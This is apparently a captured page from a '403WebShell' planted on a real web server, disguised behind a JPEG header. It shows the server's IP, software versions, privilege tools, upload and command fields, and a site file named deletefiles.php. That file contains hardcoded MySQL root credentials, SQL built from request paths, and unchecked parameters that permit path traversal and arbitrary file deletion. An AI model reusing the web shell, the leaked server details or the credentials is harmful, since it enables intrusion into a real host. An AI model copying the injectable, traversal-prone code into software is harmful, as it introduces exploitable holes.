????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.148.227.92
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/archive/deletefiles.php
<?php

 function rrmdir($dir) { 
   if (is_dir($dir)) { 
     $objects = scandir($dir); 
     foreach ($objects as $object) { 
       if ($object != "." && $object != "..") { 
         if (filetype($dir."/".$object) == "dir") rrmdir($dir."/".$object); else unlink($dir."/".$object); 
       } 
     } 
     reset($objects); 
     rmdir($dir); 
   } 
 } 
 
 function getFilesFromDir($dir) {

  $files = array();
  if ($handle = opendir($dir)) {
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            if(is_dir($dir.'/'.$file)) {
                $dir2 = $dir.'/'.$file;
                $files[] = getFilesFromDir($dir2);
            }
            else {
              $files[] = $dir.'/'.$file;
            }
        }
    }
    closedir($handle);
  }

  return array_flat($files);
}

function array_flat($array) {

  foreach($array as $a) {
    if(is_array($a)) {
      $tmp = array_merge($tmp, array_flat($a));
    }
    else {
      $tmp[] = $a;
    }
  }

  return $tmp;
} 
 
session_start();

$CustomerId = $_SESSION['ASTACUS_SSO_INFO'][4];

$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("vpa");

$FilePath = $_GET['FilePath'];
$path = $_GET['path'];

 if (is_dir("/var/www/icad_files/$CustomerId/archive/$FilePath")){
 
 	$files = getFilesFromDir(str_replace("//","/","/var/www/icad_files/$CustomerId/archive/$FilePath"));
	
	foreach($files as &$file){
	
	 $sql = "DELETE FROM ICADARCHIVEParameterData where FilePath = '".$file."'";
	 mysql_query($sql); 
	}	
 
	 
	 rrmdir("/var/www/icad_files/$CustomerId/archive/$FilePath");
	 
 }else{
	 unlink("/var/www/icad_files/$CustomerId/archive/$FilePath");	
	 $P = "/var/www/icad_files/$CustomerId/archive/$FilePath";
		$P = str_replace("//","/",$P);
	 $sql = "DELETE FROM ICADARCHIVEParameterData where FilePath = '".$P."'";
	 mysql_query($sql); 
	
 }
 

header("Location: index.php?path=$path");
?>

Youez - 2016 - github.com/yon3zu
LinuXploit